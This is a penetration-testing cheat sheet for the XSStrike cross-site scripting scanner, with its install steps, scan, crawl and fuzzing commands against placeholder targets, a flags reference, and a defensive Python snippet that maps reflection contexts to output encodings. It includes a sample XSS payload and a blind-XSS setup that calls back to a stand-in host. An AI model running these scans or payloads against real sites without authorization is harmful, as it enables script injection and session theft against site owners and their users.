
XSStrike Cheat Sheet

Advanced XSS detection with context analysis, fuzzing, and WAF-aware payload generation.

Tags: Web Application Security · fuzzing · waf-bypass · xss · Updated 2026-06-02

Overview

XSStrike analyzes reflection context (HTML, attribute, JS) and generates tailored XSS payloads with optional crawling and blind XSS hooks. Use when Dalfox/manual testing needs deeper context-aware fuzzing on authorized endpoints.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
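An added example, not XSStrike's own code, of the reflection-context analysis the overview describes, seen from the defender's side: a constructed response in which a probe marker (`v3dm0s`, chosen here as a harmless alphanumeric marker) is reflected into four contexts, each located with Python's html.parser and mapped to the output encoding that neutralises it there.

```python
from html.parser import HTMLParser
# Output encoding a defender must apply in each reflection context (the same
# contexts a context-aware scanner distinguishes before picking a payload).
CONTEXT_ENCODING = {
    "html": "HTML-entity encode < > & \" ' in element text",
    "attribute": "attribute-encode the value and always quote the attribute",
    "script": "JSON/JS-string encode and keep the value inside quotes",
    "comment": "never reflect input into comments; strip or entity-encode",
    "unreflected": "no reflection found",
}

# Constructed response with the probe marker "v3dm0s" reflected in four contexts.
SAMPLE_RESPONSE = ('<html><body><input name="q" value="v3dm0s">'
                   '<p>Results for v3dm0s</p><script>var q = "v3dm0s";</script>'
                   '<!-- debug: v3dm0s --></body></html>')

class _ReflectionLocator(HTMLParser):
    """Records the context of every occurrence of the probe marker."""
    def __init__(self, probe):
        super().__init__()
        self.probe, self.hits, self._in_script = probe, [], False

    def handle_starttag(self, tag, attrs):
        self._in_script = self._in_script or tag == "script"
        for name, value in attrs:
            if value is not None and self.probe in value:
                self.hits.append(("attribute", tag, name))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):  # element text, or raw <script> body (CDATA)
        if self.probe in data:
            self.hits.append(("script" if self._in_script else "html", None, None))

    def handle_comment(self, data):
        if self.probe in data:
            self.hits.append(("comment", None, None))

def reflection_contexts(html, probe):
    """(context, tag, attribute) per reflection; tag/attribute set only for attributes."""
    parser = _ReflectionLocator(probe)
    parser.feed(html)
    parser.close()
    return parser.hits or [("unreflected", None, None)]

def required_encodings(html, probe):
    """Map each context the probe lands in to the encoding that neutralises it there."""
    return {ctx: CONTEXT_ENCODING[ctx] for ctx, _, _ in reflection_contexts(html, probe)}
```

A response whose reflections all fall in a single context tells you which one encoder the application is missing; a probe landing in `script` or `comment` is the case most often missed by generic HTML escaping.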

Install

git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -h

Essential commands

Single URL crawl + scan

python xsstrike.py -u "https://target.example/search?q=test"

Non-interactive fuzz one URL

python xsstrike.py -u "https://target.example/page?name=test" --skip-dom

POST request

python xsstrike.py -u "https://target.example/login" --data "user=admin&pass=x"

Common workflows

Crawl site and hunt XSS

python xsstrike.py -u "https://target.example/" --crawl -l 2
python xsstrike.py -u "https://target.example/search?q=1" --fuzzer

Blind XSS

# upstream --blind is a switch (no argument) and fires only while crawling;
# set blindPayload in core/config.py to a payload that calls back to
# https://your-callback.example/hit before running
python xsstrike.py -u "https://target.example/contact" --crawl --blind

From Burp request (copy as curl, or use --headers)

python xsstrike.py -u "https://target.example/api" \
  --headers "Cookie: session=abc\nAuthorization: Bearer token"

Custom payloads from a file

# upstream -f loads payloads (one per line, e.g. '"><svg/onload=alert(1)>');
# --seeds takes a file of crawl seed URLs, not payloads
python xsstrike.py -u "https://target.example/search?q=test" -f payloads.txt

Flags reference

-u URL

Target URL

--data

POST data

--headers

Extra headers (newline-separated)

--crawl

Crawl from URL

-l DEPTH

Crawl depth

--fuzzer

Fuzzing mode

--skip-dom

Skip DOM XSS checks

--blind

Inject the blind XSS payload from blindPayload in core/config.py while crawling (switch, takes no argument)

--skip

Skip confirmation prompts

--proxy

Route requests through the proxies defined in core/config.py (switch, takes no argument)

--timeout

Request timeout

--threads

Thread count

--seeds FILE

File of seed URLs for the crawler (use -f FILE to load custom payloads)

Tips

  • Run through Burp by pointing `proxies` in core/config.py at http://127.0.0.1:8080 and passing the --proxy switch (upstream --proxy takes no argument); setting HTTP_PROXY/HTTPS_PROXY in the environment also works because requests honours them.
  • --crawl can be noisy; limit depth (-l) and keep crawling within the hosts listed in the program's scope.
  • Compare with Dalfox for speed; use XSStrike for stubborn filtered reflections.
  • Always validate executed XSS in browser with your session context (CSP, cookies).
